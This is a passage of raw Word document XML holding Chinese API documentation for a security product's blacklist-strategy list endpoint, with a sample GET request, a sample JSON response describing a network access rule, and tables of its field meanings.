          <w:p w14:paraId="72FF0832" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CEA4AF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始时间,例如：2022-06-01 15:47:52</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4B8ED8ED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485B66FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="758AFDA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70320FA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结束时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4224C78D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180842B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/black-strategy/list?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF34B4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039CC25C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"rows": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": "629db182b4064413ce8b08bf",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"strategyName": "新建黑名单-20220606154903",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstRealmType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstGroups": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"groupId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"name": "未分组主机",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"description": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"parentId": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstTags": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagName": "全部标签",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagColor": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstIpRanges": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstAgentSize": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstAgentIds": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstIpName": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcRealmType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcGroups": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"groupId": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"platform": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"name": "未分组主机",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"description": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"parentId": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcTags": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagName": "全部标签",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagColor": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcIpRanges": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcAgentSize": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcAgentIds": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcIpName": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"ports": ["99"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"protos": ["TCP"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"status": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"updateTime": 1654501762618,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"optUsername": "admin@sec.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"displayDstIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"displaySrcIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"displayPort": "99",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"switchStatus": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"operation": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"filters": {},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorDesc": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD900CA"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563"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="5666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="467B772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3001628" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="255ECF07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="413918DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55AC9863" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0997EF97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24CF1919" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38029220" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65C55233" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="595EE1BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>strategyName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2806C5FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E62279" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1D4C0C89" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DEF4AFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstRealmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="401CAB4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E43EDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问者范围，1:业务组、标签，2:自定义主机，3：自定义ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="660AC36D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0989A75C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstGroups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00E621C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17A9BED6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5BAF2338" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45F80DF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstTags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="583CAB53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A856CE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4362474A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68E7049E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstIpRanges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01A9031C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BE8F741" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问者ip范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3844E072" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C55BC8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstAgentSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="702F1874" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59CA12EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="291318BD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="456340CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstAgentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BB97B40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65B9EF02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23395E95" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CA8CB8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstIpName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52959F3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="510AB7C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2EED5C62" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AEE3552" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcRealmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F8077A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E7B6564" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问者范围，1:业务组、标签，2:自定义主机，3：自定义ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BC1961B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62FDF823" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcGroups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44253D11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63A493A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37377FE8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CA8703D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcTags</w:t>
            </w:r>
          </w:p>
